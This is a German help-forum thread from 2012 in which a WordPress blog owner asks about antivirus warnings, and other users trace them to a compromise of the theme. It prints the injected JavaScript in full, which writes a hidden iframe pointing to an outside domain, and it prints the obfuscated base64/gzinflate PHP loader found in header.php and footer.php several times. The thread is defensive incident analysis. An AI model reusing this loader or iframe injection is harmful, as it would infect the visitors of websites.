Virenwarnung auf Worpdress Blog

**EintrachtManu** · 08. 02. 2012, 15:31

Hallo zusammen,

ich führe einen HipHop Blog und nachdem wir zu Strato gewechselt sind und ein neues Design bekommen haben sagen uns einige User, dass be Ihnen von Avast oder kaspersky eine Virenmeldung auf der Seite angezeigt wird.

Woran kann das liegen? Ich nutze das CMS Wordpress.

URL: ****

Möchte das schnellstmöglichst beheben

Für Hilfe wäre ich sehr dankbar.

LG
Manu

EDIT:
Danke für eure Hilfe, Problem behoben.

**Freakdead85** · 08. 02. 2012, 18:03

Hallo

Also ich habe mir die Seite mal angeschaut und muss sagen das bei mir keinerlei Meldung über ein Virus kommt, aber sehr guter Blog

.

Vom hören und sagen andere Leute die ich so kenne haben die auch solche probleme und das nicht nur in deiner Seite die meinen es könnte an dem Virenprogramm liegen die da wohl irgendwas nicht erkennen und als Virus einstufen ob dies der Fall ist hab ich aber keine Ahnung.

Mich würde das auch mal interessieren warum manche Seiten eine Virenmeldung ausgeben.

**Kugelfisch23** · 08. 02. 2012, 19:13

Der Grund für die Warnungen ist mutmasslich der auf deiner Startseite mehrfach auftauchende obskure JavaScript-Code

HTML-Code:

<script type="text/javascript">function get_cookie(Name) {	var search = Name + "=";	var returnvalue = "";	if (document.cookie.length > 0) {		offset = document.cookie.indexOf(search);		if (offset != -1) { 			offset += search.length;			end = document.cookie.indexOf(";", offset);			if (end == -1)			end = document.cookie.length;			returnvalue=unescape(document.cookie.substring(offset, end));		}	}	return returnvalue;}function set_cookie(name, value) {    var cxdate = new Date();    cxdate.setYear(2024);    cxdate.setMonth(3);    cxdate.setDate(3);    document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) {	document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://www.hausauto.de/index.php"> </iframe>');	set_cookie('toppedup', '1010101');}</script>

welcher unter bestimmten Umständen ein unsichtbares iframe-Element erzeugt. Solche Techniken werden nicht selten von Malware genutzt, um auf kompromittierten Websites unbemerkt Inhalte von einer Site unter der Kontrolle des Angreifers einzubinden - meist handelt es sich dabei um Exploit-Kits, welche durch Ausnutzung bekannter Schwachstellen weitere Systeme infizieren sollen.

Was genau versuchst du mit diesem Code zu erreichen? Hast du ihn überhaupt wissentlich eingebaut?

**fuchzga** · 08. 02. 2012, 22:55

Mein Virenscanner hat ebenfalls angeschlagen.
"Malicious Injected Javascript detected."

Der Betreiber der Domain haus//auto.de hat aber schon reagiert.
Auf seiner Webseite findet man im Sourcecode noch:

HTML-Code:

<script src="http://www.hausauto.de/js/newsa.js"></script>

Das Script ist jedoch nicht mehr vorhanden. Daher läuft der Request ins Leere.

Google findet aber noch diverse andere Seiten, die eine newsa.js anbieten.
Es wird ein CGI auf der Domain tours//oftadom.com ausgeführt. Die Domain wurde am 22.12.2011 registriert, ist aber bereits wieder offline.

Anscheinend hat hier jemand erfolgreich eine Lücke im Wordpress bzw. einer Erweiterung ausgenutzt. Auf m8-rapblog.de scheint die aktuelle Version 3.3.1 zu laufen.

**EintrachtManu** · 09. 02. 2012, 10:25

Nein, das ist natürlich nicht gewollt.

Die Frage ist wo sich dieser Code befindet, damit ich ihn löschen kann?

Danke schonmal an euch beide.

EDIT: Ist das der Teil?

**Kugelfisch23** · 09. 02. 2012, 10:42

Das lässt sich ohne dein Template zu kennen nicht beantworten, mindestens jedoch ist er in den Skripten zu finden, welche die ersten Zeilen deines Dokuments und dessen Footer erzeugen. Allerdings wäre ein Entfernungsversuch nicht zu empfehlen, da du kaum ausschliessen kannst, dass bei dem Angriff Hintertüren eingebaut wurden - sinnvoll wäre aus diesem Grund, ein sauberes Backup einzuspielen (wenn du kein aktuelles Backup hast, kannst du ggf. den aktuellen Datenbestand von WordPress exportieren und die Export-Datei manuell kontrollieren - dort würde Schadcode wenigstens eher auffallen als in einer grossen Menge von WordPress-PHP-Skripten).

Ausserdem solltest du dir unbedingt Gedanken darüber machen, wie es zu dieser Kompromittierung deiner Website kommen konnte. Hast du die Zugangsdaten auch an anderer Stelle benutzt oder Trivialpasswörter gesetzt? Hast du die Zugangsdaten von fremden Systemen aus benutzt? Wurde eventuell dein eigenes System kompromittiert und die Passwörter wurden darüber ausgespäht? Überprüfe Letzteres ggf. einmal anhand von http://board.gulli.com/thread/15222...2#post12551252.

Wenn du die Ursache nicht kennst, kannst du lediglich die Symptome beseitigen. Allerdings ist dann die Gefahr, dass die Website nach kurzer Zeit wieder kompromittiert wird, relativ hoch.

**EintrachtManu** · 09. 02. 2012, 10:47

Ich kann eigentlich nur damit nichts anfangen in den Dateien:

Code:

#bbfd9f#
echo(gzinflate(base64_decode("fVNNj9MwED33Xww5bBJtSdqFE6krIfEhDoXDIiFOlTeZJIbWtmynKYL+9x3bUbfqArFkRTPz3sybGa9sbYR24H5pZInDoyt/8AOP1mTdDrJ2Qkno0G1rpX4KzD7zPebwe3bgBixyU/fAwBvhFhKWVMFh0A1GHvhuQPImZBUtZI2qhz1KV0SqYoeycz2sYeEJZ6ptLTqKv44TssHjlzaL6fJqFtim8BcMXi4JD7Mzwy2bKpsyEGCGsvkPc1Ilc4hoTx/4AyKQ/xP+RH8hmA0Sbc01PtNrhwfrjJDdVPsciDb3CU90IsVl66rTeQD2aQCSej2HEOBl0+c7Xh8b7nyzJY7wjn6zvPK+aC8I/51akt0t7l5fOzZKuj57dW0OJJP1SolPEyeespTuSe9UE1krPGph0AbvROnUx83X+6g/Bmnuelam1ckLeDBbgx0xl9kHgrbq+Gdz/+l9XorKuwdrtsqGxAfRcadMMVg0bzuqqhJtdrGhqVNaYzPoNPcDTFO4uZnwxZ67us/KbzR4NdpS5M98sY7cb+RZ9WgE9SJdidZ42eF+UKZBwxbQo+h6x5Ywiob0LIFej9rtSCaTCqypWdI7p9+U5TiORc8HywenigbLsH2F7nWyhlUZydcp7YP9m5g5pMtFOBRyWpXxka4fAQ==")));
#/bbfd9f#
?>

**bb-** · 09. 02. 2012, 11:15

Ich habe den Teil mal hier
entschlüsselt. Es kommt genau das Javascript von oben heraus.

**fuchzga** · 09. 02. 2012, 11:19

Ich habs auch mal dekodiert. Einfach mit echo gzinflate(base64_decode(blahfaselcode)); ausführen.
Der Code enthält genau das Javascript, welches Kugelfisch oben bereits gefunden hatte.

Mich würde aber auch mal interessieren, wo du diesen Code gefunden hast?
Da es ja ganz am Ende der Seite aufschlägt, war es wohl in einem Theme enthalten?
Gibt es eine footer.php ?

**EintrachtManu** · 09. 02. 2012, 13:36

Der Code befindet sich im Template Pfad in der header.php und footer.php.
Das Problem ist, wenn ich den Teil raus nehmen will bekomme ich einen Sytaxfehler und auf der Webseite wird dann folgendes angezeigt im Folter z.B..

Code:

Parse error: syntax error, unexpected '<' in /mnt/webf/d3/58/53166458/htdocs/blog/wp-content/themes/continuum/footer.php on line 10

Hier mal der Bereich wo sich der Code drin befindet:

Code:

<?php //get theme options
global $con_front, $con_layout, $con_feed, $con_reviews, $con_ads, $con_misc;
$con_front = get_option( 'con_front', $con_front );
$con_layout = get_option( 'con_layout', $con_layout );
$con_feed = get_option( 'con_feed', $con_feed );
$con_reviews = get_option( 'con_reviews', $con_reviews );
$con_ads = get_option( 'con_ads', $con_ads );
$con_misc = get_option( 'con_misc', $con_misc ); 
#bbfd9f#
echo(gzinflate(base64_decode("fVNNj9MwED33Xww5bBJtSdqFE6krIfEhDoXDIiFOlTeZJIbWtmynKYL+9x3bUbfqArFkRTPz3sybGa9sbYR24H5pZInDoyt/8AOP1mTdDrJ2Qkno0G1rpX4KzD7zPebwe3bgBixyU/fAwBvhFhKWVMFh0A1GHvhuQPImZBUtZI2qhz1KV0SqYoeycz2sYeEJZ6ptLTqKv44TssHjlzaL6fJqFtim8BcMXi4JD7Mzwy2bKpsyEGCGsvkPc1Ilc4hoTx/4AyKQ/xP+RH8hmA0Sbc01PtNrhwfrjJDdVPsciDb3CU90IsVl66rTeQD2aQCSej2HEOBl0+c7Xh8b7nyzJY7wjn6zvPK+aC8I/51akt0t7l5fOzZKuj57dW0OJJP1SolPEyeespTuSe9UE1krPGph0AbvROnUx83X+6g/Bmnuelam1ckLeDBbgx0xl9kHgrbq+Gdz/+l9XorKuwdrtsqGxAfRcadMMVg0bzuqqhJtdrGhqVNaYzPoNPcDTFO4uZnwxZ67us/KbzR4NdpS5M98sY7cb+RZ9WgE9SJdidZ42eF+UKZBwxbQo+h6x5Ywiob0LIFej9rtSCaTCqypWdI7p9+U5TiORc8HywenigbLsH2F7nWyhlUZydcp7YP9m5g5pMtFOBRyWpXxka4fAQ==")));
#/bbfd9f#
?>

<?php //set theme options
$con_twitter_name = $con_misc['twitter_name'];
$con_flickr_name = $con_misc['flickr_name'];
$con_google_analytics = $con_misc['google_analytics'];
$con_footer_credits = $con_misc['footer_credits'];
?>

		<div id="footer-wrapper">
        ......................

Ich danke euch schonmal bis jetzt und hoffe, dass ich das so schnell wie möglich mit euch auf die Reihe bekomme :/

**Kugelfisch23** · 09. 02. 2012, 13:54

Mutmasslich hast du nicht nur

PHP-Code:


#bbfd9f#

echo(gzinflate(base64_decode("fVNNj9MwED33Xww5bBJtSdqFE6krIfEhDoXDIiFOlTeZJIbWtmynKYL+9x3bUbfqArFkRTPz3sybGa9sbYR24H5pZInDoyt/8AOP1mTdDrJ2Qkno0G1rpX4KzD7zPebwe3bgBixyU/fAwBvhFhKWVMFh0A1GHvhuQPImZBUtZI2qhz1KV0SqYoeycz2sYeEJZ6ptLTqKv44TssHjlzaL6fJqFtim8BcMXi4JD7Mzwy2bKpsyEGCGsvkPc1Ilc4hoTx/4AyKQ/xP+RH8hmA0Sbc01PtNrhwfrjJDdVPsciDb3CU90IsVl66rTeQD2aQCSej2HEOBl0+c7Xh8b7nyzJY7wjn6zvPK+aC8I/51akt0t7l5fOzZKuj57dW0OJJP1SolPEyeespTuSe9UE1krPGph0AbvROnUx83X+6g/Bmnuelam1ckLeDBbgx0xl9kHgrbq+Gdz/+l9XorKuwdrtsqGxAfRcadMMVg0bzuqqhJtdrGhqVNaYzPoNPcDTFO4uZnwxZ67us/KbzR4NdpS5M98sY7cb+RZ9WgE9SJdidZ42eF+UKZBwxbQo+h6x5Ywiob0LIFej9rtSCaTCqypWdI7p9+U5TiORc8HywenigbLsH2F7nWyhlUZydcp7YP9m5g5pMtFOBRyWpXxka4fAQ==")));

#/bbfd9f#

sondern auch das anschliessende schliessende PHP-Tag `?>` entfernt. Das würde dazu führen, dass das Folgende `<?php` nicht als PHP-Starttag, sondern als (syntaktisch nicht korrekter) PHP-Code interpretiert würde, was zur genannten Fehlermeldung führen würde.

Wie erwähnt kann ich jedoch nur davor warnen, solche Entfernungsversuche vorzunehmen, da eventuell eingebaute Hintertüren sehr leicht wieder zur Kompromittierung deiner Website genutzt werden können. Spiele ein sauberes Backup ein - oder installiere WordPress neu und spiele die zuvor kontrollierte Export-Datei deines aktuellen Datenbestands ein.